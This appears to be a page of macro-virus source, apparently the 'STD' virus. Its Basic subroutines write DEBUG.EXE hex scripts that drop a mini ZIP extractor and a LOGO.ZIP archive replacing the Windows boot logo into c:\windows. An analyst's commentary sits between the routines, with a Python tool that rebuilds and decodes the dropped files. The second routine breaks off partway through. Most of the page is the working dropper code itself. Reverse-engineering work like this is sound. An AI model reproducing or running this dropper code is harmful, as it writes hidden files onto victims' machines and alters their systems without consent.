Print #2, "E 0840 BD E2 A8 E8 0C 00 59 5E 5F C3 BA 81 0B B0 04 E9"
Print #2, "E 0850 EA F8 85 C0 74 F3 52 A3 D6 A9 89 3E D8 AE BF D8"
Print #2, "E 0860 A9 57 B9 10 00 33 C0 F3 AB 5F 56 8B 0E D6 A9 33"
Print #2, "E 0870 DB AC 8A D8 D1 E3 FF 01 E2 F7 BE B2 A9 BB 02 00"
Print #2, "E 0880 33 C0 89 00 B1 0F 03 87 D8 A9 D1 E0 43 43 89 00"
Print #2, "E 0890 E2 F4 83 38 00 74 12 BE DA A9 B9 0F 00 33 DB AD"
Print #2, "E 08A0 03 D8 E2 FB 83 FB 01 77 A1 5E 56 8B 0E D6 A9 BF"
Print #2, "E 08B0 C0 0B AC 32 E4 85 C0 74 0E 8B D8 D1 E3 8B 87 B2"
Print #2, "E 08C0 A9 40 89 87 B2 A9 48 AB E2 E8 5E 56 BF C0 0B 8B"
Print #2, "E 08D0 16 D6 A9 AC 8A C8 49 78 17 74 15 8B 1D 33 C0 D1"
Print #2, "E 08E0 EB D1 D0 E0 FA 41 D1 EB D3 D0 AB 4A 75 E5 EB 07"
Print #2, "E 08F0 47 47 33 C9 4A 75 DC 5E 8B 3E D8 AE B9 00 01 33"
Print #2, "E 0900 C0 F3 AB BF C0 0B 8B 16 D6 A9 A3 D6 A9 4A 03 F2"
Print #2, "E 0910 03 FA 03 FA FD AC 84 C0 74 1E 3C 08 77 22 91 B8"
Print #2, "E 0920 01 00 41 D3 E0 8B 1D D1 E3 56 8B 36 D8 AE 89 10"
Print #2, "E 0930 03 D8 80 FF 02 72 F7 5E 4F 4F 4A 79 D8 FC 5A C3"
Print #2, "E 0940 2C 08 8A C8 8B 05 8A D8 32 FF D1 E3 03 1E D8 AE"
Print #2, "E 0950 B5 01 56 52 83 3F 00 75 18 8B 16 D6 A9 8B F2 D1"
Print #2, "E 0960 EA F7 D2 89 17 83 06 D6 A9 04 33 D2 89 12 89 52"
Print #2, "E 0970 02 8B 1F F7 D3 D1 E3 03 DD 84 E5 74 02 43 43 D0"
Print #2, "E 0980 E5 FE C9 75 CF 5A 89 17 EB AD 51 52 8B CF BA 00"
Print #2, "E 0990 0E 8B FA 2B CA 89 0E DC AE E8 03 00 5A 59 C3 53"
Print #2, "E 09A0 52 E8 DC F9 5A 8B 1E D0 AE B4 40 CD 21 5B 3B C1"
Print #2, "E 09B0 75 01 C3 B4 3E CD 21 BA 2C AA B4 41 CD 21 BA B1"
Print #2, "E 09C0 0B B0 06 E9 76 F7 0D 0A 50 4B 55 4E 5A 4A 52 28"
Print #2, "E 09D0 54 4D 29 20 20 46 41 53 54 21 20 20 4D 69 6E 69"
Print #2, "E 09E0 20 45 78 74 72 61 63 74 20 55 74 69 6C 69 74 79"
Print #2, "E 09F0 20 20 56 65 72 73 69 6F 6E 20 32 2E 30 34 67 20"
Print #2, "E 0A00 20 30 32 2D 30 31 2D 39 33 0D 0A 43 6F 70 72 2E"
Print #2, "E 0A10 20 31 39 38 39 2D 31 39 39 33 20 50 4B 57 41 52"
Print #2, "E 0A20 45 20 49 6E 63 2E 20 41 6C 6C 20 52 69 67 68 74"
Print #2, "E 0A30 73 20 52 65 73 65 72 76 65 64 2E 0D 0A 00 50 4B"
Print #2, "E 0A40 55 4E 5A 4A 52 3A 20 00 0D 0A 00 53 65 61 72 63"
Print #2, "E 0A50 68 69 6E 67 20 5A 49 50 3A 20 00 57 61 72 6E 69"
Print #2, "E 0A60 6E 67 21 20 00 00 50 4B 00 00 45 72 72 6F 72 20"
Print #2, "E 0A70 69 6E 20 5A 49 50 20 2D 20 55 73 65 20 50 4B 5A"
Print #2, "E 0A80 69 70 46 69 78 00 44 6F 20 79 6F 75 20 77 61 6E"
Print #2, "E 0A90 74 20 74 6F 20 65 78 74 72 61 63 74 20 74 68 65"
Print #2, "E 0AA0 73 65 20 66 69 6C 65 73 20 6E 6F 77 20 28 79 2F"
Print #2, "E 0AB0 6E 29 3F 20 00 54 6F 6F 20 6D 61 6E 79 20 66 69"
Print #2, "E 0AC0 6C 65 73 00 43 61 6E 27 74 20 4F 70 65 6E 3A 20"
Print #2, "E 0AD0 00 55 73 61 67 65 3A 20 20 70 6B 75 6E 7A 6A 72"
Print #2, "E 0AE0 20 5B 2D 6F 5D 20 66 69 6C 65 6E 61 6D 65 5B 2E"
Print #2, "E 0AF0 7A 69 70 5D 20 5B 6F 75 74 70 75 74 5F 70 61 74"
Print #2, "E 0B00 68 5D 0D 0A 00 55 6E 6B 6E 6F 77 6E 20 63 6F 6D"
Print #2, "E 0B10 70 72 65 73 73 69 6F 6E 20 6D 65 74 68 6F 64 20"
Print #2, "E 0B20 66 6F 72 3A 20 00 20 61 6C 72 65 61 64 79 20 65"
Print #2, "E 0B30 78 69 73 74 73 21 20 4F 76 65 72 77 72 69 74 65"
Print #2, "E 0B40 3F 20 00 43 61 6E 27 74 20 63 72 65 61 74 65 3A"
Print #2, "E 0B50 20 00 66 69 6C 65 20 66 61 69 6C 73 20 43 52 43"
Print #2, "E 0B60 20 63 68 65 63 6B 00 45 78 74 72 61 63 74 69 6E"
Print #2, "E 0B70 67 3A 20 00 20 49 6E 66 6C 61 74 69 6E 67 3A 20"
Print #2, "E 0B80 00 46 69 6C 65 20 68 61 73 20 61 20 62 61 64 20"
Print #2, "E 0B90 74 61 62 6C 65 00 10 11 12 00 08 07 09 06 0A 05"
Print #2, "E 0BA0 0B 04 0C 03 0D 02 0E 01 0F 01 03 07 0F 1F 3F 7F"
Print #2, "E 0BB0 FF 64 69 73 6B 20 66 75 6C 6C 00 00 01 00"
Print #2, "RCX"
Print #2, "0ABE"
Print #2, "W"
Print #2, "Q"
Close #2
End Sub
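CreatePKunzip and the LogoZip sub that follows do not drop binaries directly: they write DEBUG.EXE scripts (`N` names the output file, `E` pokes bytes at an offset in the segment, `RCX` followed by a hex line sets CX, `W` writes CX bytes from CS:0100, `Q` quits). The part of the source that feeds these scripts to DEBUG is not on this page. An analyst reconstructs the dropped files the same way, and two sanity checks are worth running on the script itself: the `E` lines in CreatePKunzip run from 0100 to 0BBD and `RCX` is 0ABE, which is 0BBE minus 0100, so the script is internally consistent; and the text at 09C8 reads "PKUNZJR(TM) FAST! Mini Extract Utility" (PKWARE's mini extractor), not PKUNZIP as the `N` line claims. The Python below is an added example, not part of the STD source. It reassembles a DEBUG script and decodes a ZIP local file header; the sample is the first three `E` lines of the logo.dbg script plus a constructed `RCX`/`W`/`Q` trailer that writes only those 48 bytes. The decoded header shows a deflated entry named `logo.SYS` with an uncompressed size of 129078 bytes, which is the size of a Win9x LOGO.SYS (320x400, 256-colour BMP), so the payload replaces the boot logo.

```python
import struct

# Constructed sample: the first three "E" lines of the logo.dbg script written
# by LogoZip() (the local header and name of the archived file), followed by a
# constructed RCX/W/Q trailer that writes just those 48 bytes. The real script
# writes the whole archive.
SAMPLE_DBG = """N LOGO.ZIP
E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 17 D3
E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6C 6F
E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6B 04
RCX
0030
W
Q
"""

def parse_debug_script(text):
    """Reassemble the file a DEBUG.EXE script would write.

    N sets the output name, E pokes bytes at an offset in the 64 KiB segment,
    RCX (followed by a hex line) sets CX, W writes CX bytes from CS:0100 to the
    named file, Q quits. Returns the name, the written bytes, the CX value and
    the number of bytes the E lines actually covered above 0100h, so a mismatch
    between RCX and the poked range is visible.
    """
    image = bytearray(0x10000)
    name, cx, written, high = None, None, None, 0x100
    lines = iter(text.splitlines())
    for line in lines:
        line = line.strip()
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "N":
            name = rest.strip()
        elif cmd == "E":
            addr_s, _, hexbytes = rest.partition(" ")
            addr = int(addr_s, 16)
            data = bytes.fromhex(hexbytes)
            image[addr:addr + len(data)] = data
            high = max(high, addr + len(data))
        elif cmd == "RCX":
            cx = int(next(lines).strip(), 16)
        elif cmd == "W":
            if cx is None:
                raise ValueError("W without a preceding RCX")
            written = bytes(image[0x100:0x100 + cx])
        elif cmd == "Q":
            break
    return {"name": name, "data": written, "cx": cx, "poked": high - 0x100}

def dos_datetime(date, time):
    """Decode a packed DOS date/time pair as used in FAT and ZIP headers."""
    return "%04d-%02d-%02d %02d:%02d:%02d" % (
        1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F,
        time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)

def zip_local_header(data):
    """Decode the first local file header of a ZIP archive (signature 50 4B 03 04)."""
    if data[:4] != b"PK\x03\x04":
        return None
    (version, flags, method, mtime, mdate, crc, csize, usize,
     name_len, extra_len) = struct.unpack_from("<HHHHHIIIHH", data, 4)
    name = data[30:30 + name_len].decode("ascii", "replace")
    return {"name": name, "method": method, "crc32": crc,
            "compressed_size": csize, "uncompressed_size": usize,
            "modified": dos_datetime(mdate, mtime), "flags": flags,
            "version": version, "extra_len": extra_len}

if __name__ == "__main__":
    script = parse_debug_script(SAMPLE_DBG)
    print(script["name"], script["cx"], script["poked"])
    print(zip_local_header(script["data"]))
```

Feeding the complete pkunzip.dbg text to `parse_debug_script` gives a 2750-byte (0ABEh) COM image; method 8 in the logo header means deflate, so the dropped extractor is needed to unpack it on a DOS box.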
Sub LogoZip()
Open "c:\windows\logo.dbg" For Output As #3
Print #3, "N LOGO.ZIP"
Print #3, "E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 17 D3"
Print #3, "E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6C 6F"
Print #3, "E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6B 04"
Print #3, "E 0130 07 8E E4 3F 20 28 36 6C 28 15 60 40 81 E1 44 81"
Print #3, "E 0140 E0 50 89 52 45 0A 9D 39 B3 33 67 86 23 47 4A 9D"
Print #3, "E 0150 28 76 A0 DC 86 42 07 86 9D 71 E9 66 73 99 85 FB"
Print #3, "E 0160 BE CC 0C 7D 6F 55 F5 CA 2E D7 13 6E BF 9E 9E E1"
Print #3, "E 0170 77 04 E1 91 C5 4B 72 FA 9B EA 66 73 58 F7 F0 37"
Print #3, "E 0180 BF FD 74 7F A3 98 4F 7F A2 D4 CF E9 DF 5F D3 D5"
Print #3, "E 0190 BF D0 FF 37 EA A7 7A 5C AD 6F D4 BF 3E 54 EA 9F"
Print #3, "E 01A0 1F 9A AB 2D F3 8F 3A D3 7F EA 7C 56 00 80 F7 CD"
Print #3, "E 01B0 59 FD 4C CD D5 C7 2A 54 9F A8 7F AB CF D4 3F D4"
Print #3, "E 01C0 17 EA EF EA 2B F5 37 F5 8D FA AB FA BD FA 13 FD"
Print #3, "E 01D0 F7 7B BA F4 0D 8D 7C 45 B7 7C 41 15 9F 51 E5 27"
Print #3, "E 01E0 74 8F 8F E9 9E 3F E3 BD 55 2D 68 1F 8E 3E 52 EA"
Print #3, "E 01F0 BF BF 50 EA 87 5F 29 F5 FD E7 4A 7D F7 A5 52 DF"
Print #3, "E 0200 7E AD D4 9F 7F A7 D4 1F FF A0 D4 EF FE AC D4 D7"
Print #3, "E 0210 DF 2A F5 E5 77 4A 7D FE BD 52 BF FA 41 A9 5F FE"
Print #3, "E 0220 47 A9 8F 22 A5 3E 5C E8 1F 45 3D 4C 66 8B D5 66"
Print #3, "E 0230 77 38 3D 9D DB DD A0 D7 1F DE DE 8F A7 3C B4 DD"
Print #3, "E 0240 1F 69 AC D5 09 C2 A8 3F 1C DD DD 3F 4C 68 78 B9"
Print #3, "E 0250 5A 6F B6 BB C3 F1 78 7A 7C 7A 3E B7 5A ED 4E A7"
Print #3, "E 0260 DB 0D 82 30 EC F5 7A 51 16 BA 1E 86 41 D0 ED 76"
Print #3, "E 0270 3A ED 56 EB FC FC F4 78 3A 1E 0F BB ED 66 BD 5A"
Print #3, "E 0280 2E 66 D3 C9 C3 FD DD 68 D8 8F C2 A0 D3 3A 3F 9D"
Print #3, "E 0290 8E FB ED 66 45 C3 E3 FB DB 61 BF 17 74 DB 34 76"
Print #3, "E 02A0 D8 F1 D0 E4 E1 6E 34 88 C2 6E A7 F5 FC 48 55 EB"
Print #3, "E 02B0 E5 7C AA 87 A8 AA 43 55 34 B6 DB AC ED 23 DE 8E"
Print #3, "E 02C0 86 34 1E 06 5D 7A 4A 7E 46 7A CA C3 61 BF DF 6D"
Print #3, "E 02D0 B7 DB CD 66 CD AC 0C FA F2 66 43 E3 BB FD FE 70"
Print #3, "E 02E0 A0 8D D1 5B D3 EE 74 83 B0 D7 1F 0C 47 B7 76 6B"
Print #3, "E 02F0 D7 9B DD FE F8 48 C9 74 28 99 C1 E8 8E 46 E7 CB"
Print #3, "E 0300 35 25 F3 F8 DC EA 74 C3 48 0F E9 FC CC 90 CE 4F"
Print #3, "E 0310 0F 71 15 65 AA CB F8 AE 34 4A B1 CE F9 21 E9 49"
Print #3, "E 0320 0F 3A 3F 7E 4A 0E 30 B0 01 26 11 EA CB 1C 5F C0"
Print #3, "E 0330 F1 F1 C6 E8 FC 0E 7B CE 6F B9 98 53 50 0F 77 B7"
Print #3, "E 0340 1C 82 0E 86 B2 E2 64 74 58 3A 3F 13 56 2E 3F 93"
Print #3, "E 0350 A8 CE 8F 42 E6 A1 4C F2 CB F9 6C 62 1F 31 E2 FC"
Print #3, "E 0360 32 BF 31 8A 6F 67 E3 5B 65 B1 01 EE 38 C0 74 36"
Print #3, "E 0370 70 7E 91 DD DA C9 6C BE CC CD 22 1A A6 A9 C5 F9"
Print #3, "E 0380 D9 D9 A6 F3 B3 43 F9 48 79 88 E6 24 8D E9 49 19"
Print #3, "E 0390 0D 28 D5 FB 31 0D 9B 09 68 7E 67 F4 94 36 40 3D"
Print #3, "E 03A0 03 4D 82 31 61 32 FB 28 3E B3 31 34 17 CC F4 A3"
Print #3, "E 03B0 29 34 BE A7 A4 06 91 9E 6A 94 D5 81 27 91 9D 59"
Print #3, "E 03C0 F9 C9 66 67 64 27 33 23 F5 10 47 4A 55 3A D3 95"
Print #3, "E 03D0 7D 44 9E 7E 51 3A FD 4E 27 1B DF 86 E3 D3 A9 2D"
Print #3, "E 03E0 0D 36 41 1A B7 01 9E 4E E9 04 8C 78 02 DA AD 5D"
Print #3, "E 03F0 E9 AC 28 19 0E 4B EF 9A 99 BD B5 63 F7 56 DF F1"
Print #3, "E 0400 06 B8 E1 BD D5 5F 05 5C F0 DE EA AF 02 2E F8 98"
Print #3, "E 0410 E8 AF 02 2E F8 00 E8 AF 02 2E F8 CC CE 5F 05 5C"
Print #3, "E 0420 F0 E9 8A BF 0A B8 E0 33 3B 7F 15 70 C1 67 80 FE"
Print #3, "E 0430 2A E0 82 DF 9A F9 AB 80 0B 7E BF E6 AF 02 2E F8"
Print #3, "E 0440 5D 9D BF 0A B8 E0 B7 C0 FE 2A E0 82 FF B6 E2 AF"
Print #3, "E 0450 02 2E F8 0F 56 FE 2A E0 82 FF 38 EA AF 02 2E F8"
Print #3, "E 0460 6F 80 FE 2A E0 82 FF 2E ED AF 02 2E F8 EF D2 FE"
Print #3, "E 0470 2A E0 82 3F DD F0 57 01 17 FC 91 9B BF 0A B8 E0"
Print #3, "E 0480 8F DC FC 55 C0 05 7F 8A E9 AF 02 2E F8 53 4C 6F"
Print #3, "E 0490 11 70 C2 6B 0E BC 45 C0 09 7F B2 EE AF 02 2E 78"
Print #3, "E 04A0 19 87 BF 0A B8 E0 A5 31 FE 2A E0 82 17 0D F9 AB"
Print #3, "E 04B0 80 0B 5E 60 E5 AF 02 2E 78 1D 96 BF 0A B8 E0 15"
Print #3, "E 04C0 92 FE 2A E0 82 57 4D FA AB 80 0B 5E DC EB AF 02"
Print #3, "E 04D0 2E 78 21 AA BF 0A B8 E0 C5 BD FE 2A E0 82 97 8D"
Print #3, "E 04E0 FB AB 80 0B 5E 9D EF AF 02 2E 78 25 BE BF 0A B8"
Print #3, "E 04F0 E0 1E 0F 7F 15 70 C1 7D 33 FE 2A E0 82 9B B4 FC"
Print #3, "E 0500 55 C0 05 B7 22 F9 AB 80 0B 6E 1C F4 57 01 17 DC"
Print #3, "E 0510 38 E8 AF 02 2E B8 BF D0 5F 05 5C 70 2F A6 BF 0A"
Print #3, "E 0520 B8 E0 06 61 7F 15 70 C1 9D D3 FE 2A E0 82 DB CC"
Print #3, "E 0530 FD 55 C0 05 37 A3 FB AB 80 0B EE F0 F7 57 01 17"
Print #3, "E 0540 AC 8E F0 57 01 17 AC E8 F0 57 01 17 6C E3 F0 57"
Print #3, "E 0550 01 17 2C CA F1 57 01 17 2C CA F1 57 01 17 EC D8"
Print #3, "E 0560 F1 57 01 17 AC 23 F2 57 01 17 2C C9 F2 57 01 17"
Print #3, "E 0570 2C 0F F3 57 01 17 AC FA F3 57 01 17 AC FA F3 57"
Print #3, "E 0580 01 17 AC FA F3 57 01 17 6C 4F F4 57 01 17 2C 54"
Print #3, "E 0590 F4 57 01 17 EC 3A F5 57 01 17 6C 85 F5 57 01 17"
Print #3, "E 05A0 6C 94 F5 57 01 17 2C 3A F6 57 01 17 2C 2B F6 57"
Print #3, "E 05B0 01 17 2C 3A F6 57 01 17 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 05C0 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 05D0 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 05E0 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 05F0 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 0600 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 0610 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 0620 A3 46 FF F3 0D E1 AF 7A 0F DC 24 F8 6B 7F 2C 35"
Print #3, "E 0630 FA 9F 2F 36 E0 83 12 1C F7 15 71 93 C1 5F FD E3"
Print #3, "E 0640 A8 D1 FF FC 62 F9 25 BC 87 00 AB F0 3F A7 3F 54"
Print #3, "E 0650 F6 C7 BB 48 E4 5D 67 41 5A 90 29 2D CF F8 E2 F1"
Print #3, "E 0660 D2 9B CB 7E 19 EF 25 3F B1 BF F8 5D B7 37 DE 54"
Print #3, "E 0670 5F 82 EF 9C DF 4D 86 4C 59 F1 D2 7B DD 81 2B F0"
Print #3, "E 0680 3F 97 6D 6F D9 76 94 E6 52 86 6B 73 0B 53 EA C7"
Print #3, "E 0690 3C EF 4D FC 6F F5 F9 89 FD C5 AF 21 BF E2 A5 CA"
Print #3, "E 06A0 A8 C0 FF 5C FD 76 98 DB 2F AA 9A 99 9F D8 5F 7C"
Print #3, "E 06B0 93 C3 8C BD 64 7E 1F 14 8A 93 5B 33 3F 5F 65 54"
Print #3, "E 06C0 E0 7F 2E CD E5 83 0C 99 BA 38 17 CF 66 DC DC DC"
Print #3, "E 06D0 94 54 15 F2 2B DB CF 3F C8 51 52 57 7D 7E 62 7F"
Print #3, "E 06E0 71 FA 53 E5 7E BE C2 46 E4 36 A3 F8 10 45 CA EB"
Print #3, "E 06F0 8A F9 95 D4 99 92 C2 13 27 BF BA F7 90 5F 05 FE"
Print #3, "E 0700 67 47 7E 22 4A 63 BE CC EF E5 A9 C0 FF 5C 4B 7E"
Print #3, "E 0710 17 B3 B9 21 54 E1 7F 4E 37 B4 BA DD A3 F8 AB 68"
Print #3, "E 0720 6E 7E F0 17 4B 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 0730 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 0740 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 0750 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 0760 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 0770 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 0780 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0790 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 07A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 07B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 07C0 03 FE 67 19 B5 FA 9F A7 93 87 FB BB DB D1 70 10"
Print #3, "E 07D0 F5 E2 27 3D EC B7 EB D5 62 36 1D DF DF E5 DE 47"
Print #3, "E 07E0 D2 58 EE 73 D5 5D D2 E5 D3 6F D4 EF BB 46 FF F3"
Print #3, "E 07F0 6C 3A 19 73 7E C3 41 3F EA 05 D6 BA 7A D8 6D D7"
Print #3, "E 0800 4B CA 6A 7C 7F 9B 7B 1F B4 9C 4F B3 9F 0B 1E 76"
Print #3, "E 0810 1B BB 4C 7B D8 EF 05 AA 39 D4 E8 7F 9E 4E 26 14"
Print #3, "E 0820 09 4F 3F 7A DB 1D 74 52 6D 23 65 75 F1 19 7E 21"
Print #3, "E 0830 BF FD 36 CE 6F 10 85 41 B1 F8 05 A9 D1 FF CC D3"
Print #3, "E 0840 8F F3 1B D0 09 67 D8 ED A4 DA C1 45 3E 2B 33 36"
Print #3, "E 0850 9B 64 3F 17 A4 BD DC 2E D3 A6 FC 9A 24 0C AE D1"
Print #3, "E 0860 FF 3C 19 73 7E 34 FD 28 BF A0 DB CE E4 37 9B F8"
Print #3, "E 0870 F2 DB 6D E2 FC FA C9 AE DF 08 6A F4 3F F3 D1 8F"
Print #3, "E 0880 F3 EB D3 09 27 ED BE A9 76 70 9E CF CA 8C D1 2B"
Print #3, "E 0890 4A E6 2A 1D FE 38 51 3A 78 52 7E 4D 12 06 D7 E8"
Print #3, "E 08A0 7F 1E 3F 70 7E FC EA 41 6F BB 3B AD 4C 7E D3 B1"
Print #3, "E 08B0 2F 3F 7E 91 36 97 68 F7 6D 52 7E 35 FA 9F F9 C5"
Print #3, "E 08C0 37 BE 4C BB 6F AA 1D 9C E5 B3 32 63 34 D9 32 57"
Print #3, "E 08D0 E9 F0 67 97 69 53 7E 4D 12 06 D7 E8 7F 7E B8 4F"
Print #3, "E 08E0 F3 A3 DD 37 93 DF E4 21 9B 1F 9F 11 9A FC D2 D7"
Print #3, "E 08F0 8A CD 2A CE AF 97 7D E5 7E 79 6A F4 3F F3 B9 5F"
Print #3, "E 0900 7C 99 76 5F A3 1D E4 60 A6 F6 C0 66 6F E3 D7 5A"
Print #3, "E 0910 DE 7D E9 95 3A 93 DF C2 2E D3 A6 FC EA 12 06 BF"
Print #3, "E 0920 0B 35 FA 9F EF EF D2 FC 68 F7 35 F9 25 6F 3E 06"
Print #3, "E 0930 49 7E 3B 9D 29 9F 50 67 5E 2B 96 49 97 4F A3 76"
Print #3, "E 0940 DF 3A FD CF 6F 92 1A FD CF 6F 92 2A FC CF D7 4C"
Print #3, "E 0950 05 FE E7 AB A6 02 FF F3 55 53 81 FF F9 AA A9 C0"
Print #3, "E 0960 FF 7C D5 54 E0 7F BE 6A 2A F0 3F 5F 35 15 F8 9F"
Print #3, "E 0970 AF 9A 0A FC CF 57 4D 05 FE E7 AB A6 0A FF F3 35"
Print #3, "E 0980 03 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0990 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 09A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 09B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 09C0 03 FE 67 19 F0 3F CB 80 FF 59 46 15 FE E7 20 0C"
Print #3, "E 09D0 7B BD 28 8A FA 84 1D EA F7 23 D3 96 1D 04 DD B8"
Print #3, "E 09E0 5F E3 F1 74 BA F8 A8 B4 DF 0B B9 95 E1 F1 A4 FB"
Print #3, "E 09F0 08 33 37 D0 D8 71 9F 76 2D 68 9E A8 2A 73 95 7B"
Print #3, "E 0A00 C0 9E 69 8C 7B E3 E2 3A D3 DB 19 D4 D7 22 52 85"
Print #3, "E 0A10 FF 99 F2 33 01 52 84 76 88 2F F3 BF 21 C7 97 E4"
Print #3, "E 0A20 77 BC F8 A8 8F 1B 31 DB 67 CA 8A 1B 2C 33 F9 B5"
Print #3, "E 0A30 CF 3A 98 7C 7E 94 68 3E BF 24 F9 D5 C2 D6 E9 DE"
Print #3, "E 0A40 4E 6E 4E 6C D7 B4 AA BB 2A FF 33 05 98 ED CB 8D"
Print #3, "E 0A50 22 7D 55 CF BE B8 5F E3 74 2C C9 2F 2C ED C6 A2"
Print #3, "E 0A60 4C 4B 56 D5 F1 8C CC 5C CD F5 80 A5 F0 F4 53 ED"
Print #3, "E 0A70 D6 B9 9E 65 A1 55 F9 9F 79 06 66 AE F6 7A 71 7E"
Print #3, "E 0A80 14 5F 92 DF E1 E2 A3 BE 5E 59 37 96 AB C5 83 A7"
Print #3, "E 0A90 5A E6 6A 90 ED 01 4B D1 F9 29 CA AF 96 75 8D 55"
Print #3, "E 0AA0 F9 9F 79 1F CE 5C ED F5 F8 AA 99 7D F1 AE 74 3C"
Print #3, "E 0AB0 94 E4 17 5C B6 73 38 3B DC 28 BF EC DF 7A 73 3D"
Print #3, "E 0AC0 60 29 F6 E8 F7 FC F4 58 C7 C2 A8 AA FC CF 41 90"
Print #3, "E 0AD0 CB 2F E4 38 29 3E DA 93 DA AD 24 BF FD C5 47 7D"
Print #3, "E 0AE0 7C A8 3A 3F D1 8E 99 19 73 76 B8 D1 EE 9B CF CF"
Print #3, "E 0AF0 1E 38 F3 55 75 E7 57 8D BF B8 1B 04 41 E6 6A 18"
Print #3, "E 0B00 06 F6 95 97 E2 B3 7B D9 61 BF DF 6D D6 AB E5 62"
Print #3, "E 0B10 9E AA 0D 72 7D D4 16 67 87 1B BF 20 67 AE 26 3D"
Print #3, "E 0B20 60 79 28 3E BE 3B C5 57 C7 C2 A8 AA FC CF DD 6E"
Print #3, "E 0B30 2E BF 20 8E 4F 51 7C 49 7E BB 8B 8F FA 72 7D D4"
Print #3, "E 0B40 C9 20 9D 97 94 2D 8A A5 A9 96 CF AF F4 10 67 F2"
Print #3, "E 0B50 AB 69 FA 55 E6 7F EE F0 BE 9A C2 E9 99 13 17 8A"
Print #3, "E 0B60 CF 1E A5 F6 BB 92 FC CA 5F 43 F9 EC 2F 37 A0 E7"
Print #3, "E 0B70 9A 96 48 A4 CD 9A BC FB 96 DC 97 E2 6B D5 16 5F"
Print #3, "E 0B80 25 FE E7 56 BB DD EE 70 80 34 09 ED 50 37 8E 4F"
Print #3, "E 0B90 51 7C 49 7E 5B BD FB 6A 0F 87 ED 64 E5 3E EA A7"
Print #3, "E 0BA0 13 1F D8 B8 8F 30 7D 48 3E 55 DE AC 53 89 44 C7"
Print #3, "E 0BB0 9E 4F 9B 2E 74 33 66 0E 9C BA DB 30 11 00 E8 73"
Print #3, "E 0BC0 67 6E 4E 7C AA 69 55 77 15 FE E7 73 AB C5 01 EA"
Print #3, "E 0BD0 04 ED 10 A7 67 5E 44 29 3E BB 97 ED B6 FC 46 81"
Print #3, "E 0BE0 8E 7E 5A 03 63 EB D2 37 1F 05 E1 CB C1 B6 EC 9B"
Print #3, "E 0BF0 6B FA A5 22 6E 6C B5 F7 B5 6F 3E F8 E4 79 1A D7"
Print #3, "E 0C00 E9 73 E7 BA CE 5D 18 F8 9F 65 C0 FF 2C 03 FE 67"
Print #3, "E 0C10 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF"
Print #3, "E 0C20 B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80"
Print #3, "E 0C30 FF 59 06 FC CF 32 E0 7F 96 51 AB FF F9 0D 52 A3"
Print #3, "E 0C40 FF F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF"
Print #3, "E 0C50 F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF B9"
Print #3, "E 0C60 04 B3 76 CF 0A 64 A3 64 30 23 1B FF BF 77 6F 00"
Print #3, "E 0C70 35 FA 9F 5D 14 F4 ED E9 2A 17 F6 17 97 DE A3 41"
Print #3, "E 0C80 D4 E8 7F 76 91 7E FA 9D E7 36 9D 92 CD A5 46 FF"
Print #3, "E 0C90 B3 8B 32 7D BB 52 C5 2F 54 69 28 0D F0 3F F3 97"
Print #3, "E 0CA0 CF 5C 0C D2 E1 EF 55 7C 2E D8 00 FF F3 34 FF 55"
Print #3, "E 0CB0 01 4C E1 DB 3F 1A 4C 03 FC CF D3 71 31 BF 65 C9"
Print #3, "E 0CC0 17 D2 34 94 06 F8 9F F9 BB A3 B2 D7 37 49 37 C2"
Print #3, "E 0CD0 2B A0 01 FE E7 C9 43 2E 3F 3E FB 33 97 1A F6 55"
Print #3, "E 0CE0 33 A5 BC AC FF 59 AF DD A3 DD 77 34 E4 46 24 33"
Print #3, "E 0CF0 C6 8B FC F8 EC 79 D4 B0 6F 8A 2A 07 FE 67 19 F0"
Print #3, "E 0D00 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C"
Print #3, "E 0D10 F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59"
